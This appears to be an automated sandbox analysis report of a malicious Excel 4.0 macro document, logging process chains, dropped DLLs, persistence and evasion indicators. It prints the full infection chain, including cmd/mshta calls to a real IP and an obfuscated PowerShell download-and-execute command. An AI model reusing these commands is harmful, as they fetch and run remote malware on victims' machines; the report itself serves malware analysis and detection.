Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0019473C 15_2_0019473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0018AB87 15_2_0018AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001A13AD 15_2_001A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001995FA 15_2_001995FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00187FF2 15_2_00187FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001859F2 15_2_001859F2
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 48F2.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: imedpub_2.xls Macro extractor: Sheet name: Macro1
Source: imedpub_2.xls Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0035E249 DeleteService, 12_2_0035E249
Yara signature match
Source: imedpub_2.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: imedpub_2.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: imedpub_2.xls OLE indicator, VBA macros: true
Source: imedpub_2.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@3/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: imedpub_2.xls OLE indicator, Workbook stream: true
Source: imedpub_2.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: imedpub_2.xls ReversingLabs: Detection: 27%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P.c.............................P.c.....................`I.........v.....................K........D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.......................k..... ..............................}..v............0.................D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................I..k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................I..k....................................}..v....h.......0.................D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#..................k....................................}..v.....8......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#..................k......D.............................}..v.....9......0.................D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'..................k....E...............................}..v............0...............h.D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+..................k....E...............................}..v....@.......0...............h.D............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDE7C.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbG source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: 48F2.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029200C4 push 8B4901F9h; iretd 4_3_029200CA
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029208C5 push 8B4901F9h; iretd 4_3_029208CA
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029200C4 push 8B4901F9h; iretd 4_3_029200CA
Source: C:\Windows\System32\mshta.exe Code function: 4_3_029208C5 push 8B4901F9h; iretd 4_3_029208CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FF00280A21 pushad ; ret 6_2_000007FF00280B61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8882a

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Stores large binary data to the registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
